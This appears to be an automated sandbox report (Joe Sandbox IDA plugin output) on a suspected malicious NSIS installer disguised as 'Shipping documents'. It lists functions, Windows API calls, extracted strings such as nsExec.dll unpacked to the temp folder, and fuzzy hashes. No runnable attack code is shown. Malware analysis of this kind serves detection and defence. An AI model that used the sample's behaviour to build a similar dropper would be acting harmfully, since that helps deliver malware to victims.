Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4187626192-2997835319
Opcode ID: 3c28ae1c7ce8c1b53528908d8ac53578659c627eaf9f04ce26a2ce276e9f7094
Instruction ID: 8c51b57b95ad5d2f56c6428f73255cfba4eda90222275d8884e674a65d57f274
Opcode Fuzzy Hash: 3c28ae1c7ce8c1b53528908d8ac53578659c627eaf9f04ce26a2ce276e9f7094
Instruction Fuzzy Hash: 05611471240216ABDB20AF248C40A7B76A5EF99314F12453FF942FB2D1D77CD9218B6D

Function 00405D3A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D6C
lstrlenW.KERNEL32(?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D7E
lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D99
SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 00405DB1
SendMessageW.USER32(?), ref: 00405DD8
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070

Strings

Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 00405D57, 00405D65, 00405D6B, 00405D93, 00405D98, 00405DA0, 00405DAA

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll
API String ID: 1759915248-3666549865
Opcode ID: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
Instruction ID: 65e3057419f119a88936ccc655a9da3a15af0d16a1f773064a71e2051a7db8da
Opcode Fuzzy Hash: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
Instruction Fuzzy Hash: D121C2B2A056206BD310AB59DC44AABBBDCEF94710F45043FB984A3291C7B89D404AED

Function 00403148 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 0040326A
MulDiv.KERNEL32(?,00000064,?), ref: 0040329A
wsprintfW.USER32 ref: 004032AB

Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F

Strings

8SB, xrefs: 00403242, 0040325F, 004032F0
... %d%%, xrefs: 004032A5
85B, xrefs: 00403155

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$85B$8SB
API String ID: 999035486-2531555371
Opcode ID: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
Instruction ID: e2bf7c2ae867e5e0c149cd35682d72f4c4d2633ef795981e2bf4a0daba4be17b
Opcode Fuzzy Hash: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
Instruction Fuzzy Hash: 355180716083019BD710DF69DD84A2BBBE8AB84756F10493FFC54E7291DB38DE088B5A

Function 0040619E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
wsprintfW.USER32 ref: 004061F1
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406205

Strings

\, xrefs: 004061C6
UXTHEME, xrefs: 004061AD
%s%S.dll, xrefs: 004061EB

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
Instruction ID: 46fd840fe6511d7ccc003e1cb9660209246fe71c7ecdf6ea51a48f4d7cc48468
Opcode Fuzzy Hash: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
Instruction Fuzzy Hash: 93F0BB7160022467DB10A764DC0DB9A36ACEB00304F50447AA906F61C2E77CDE54C79C

Function 00406A56 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406A72
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CD4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406A8D

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A5F
a, xrefs: 00406A6B
n, xrefs: 00406A64
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A5B

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-1137806429
Opcode ID: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
Instruction ID: ceede72bcc8b9f9399702d6205d38d242a1142e8e26f45c6d668c419d088e7be
Opcode Fuzzy Hash: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
Instruction Fuzzy Hash: E9F05E72700208BBEB149F55DC09BDE7779EF91B14F14803BEA41BA180E3F45E5487A4

Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48

Strings

!, xrefs: 00401DF8

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
Instruction ID: 1d489b1cab37c72f7a9fe7ae17229530812e46ff9257658ed8c6d6ee4a6b2e26
Opcode Fuzzy Hash: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
Instruction Fuzzy Hash: 4F21F471609301AFE714AF21C886A2FBBE8EF84755F00093FF585A61E0D6B99D05CB5A

Function 0040225D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004022A0
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A

Strings

C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll, xrefs: 004022CC, 00402335, 0040233E

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll
API String ID: 334405425-2461694523
Opcode ID: ef58e730e87b036fb3bb273f3d25c6645116cf6908839c118768283bfaa69e59
Instruction ID: aa6b704e5079027a8c34e107c1f377ebbd1d9565507d54c53cf3a7cdcd1ba86e
Opcode Fuzzy Hash: ef58e730e87b036fb3bb273f3d25c6645116cf6908839c118768283bfaa69e59
Instruction Fuzzy Hash: C3210632648701ABD710AF618E8DA3F76A4ABD8721F20013FF941B12D1DBBC9801979F

Function 004068E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
GetProcAddress.KERNEL32(00000000), ref: 00406910

Part of subcall function 0040619E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
Part of subcall function 0040619E: wsprintfW.USER32 ref: 004061F1
Part of subcall function 0040619E: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406205

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068E7
UXTHEME, xrefs: 004068E6, 004068F3, 004068FE

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
Instruction ID: 085141bfa328d30a19c357711f10e0b2ef6edf17adcd8b925e9f05de384a5053
Opcode Fuzzy Hash: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
Instruction Fuzzy Hash: 00D02B316012159BDB001F22AE0C94F771DEEA67907020032F501F6231E334DC21C5FC

Function 00405E3E Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E7F
GetLastError.KERNEL32 ref: 00405E89
SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405EA2
GetLastError.KERNEL32 ref: 00405EB0

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
Instruction ID: 6ae0cafa5f15e980fc825a914f3c6ead540d2f1400f747b3271702dfe1e84024
Opcode Fuzzy Hash: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
Instruction Fuzzy Hash: 3F01D675D00209EBEB009FA0D948BEFBBB9EB14315F104526E949F2291E7789A44CF99

Function 00406977 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Exec,00000000,00000000,00000002,00405FBE), ref: 004069BE
RegCloseKey.ADVAPI32(?), ref: 004069C9

Strings

Exec, xrefs: 0040697C

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: CloseQueryValue
String ID: Exec
API String ID: 3356406503-459137531
Opcode ID: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
Instruction ID: a3e06d51c6875ee3f629547af2dd4b96d71687c661178dbbbd55dab6437f425a
Opcode Fuzzy Hash: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
Instruction Fuzzy Hash: D3010C7651010ABBDB218FA4DC06AEF7BA8EF45344F110126B901E2160D275DE60DB94

Function 00405E1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00405E26
GetLastError.KERNEL32 ref: 00405E30

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1E

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
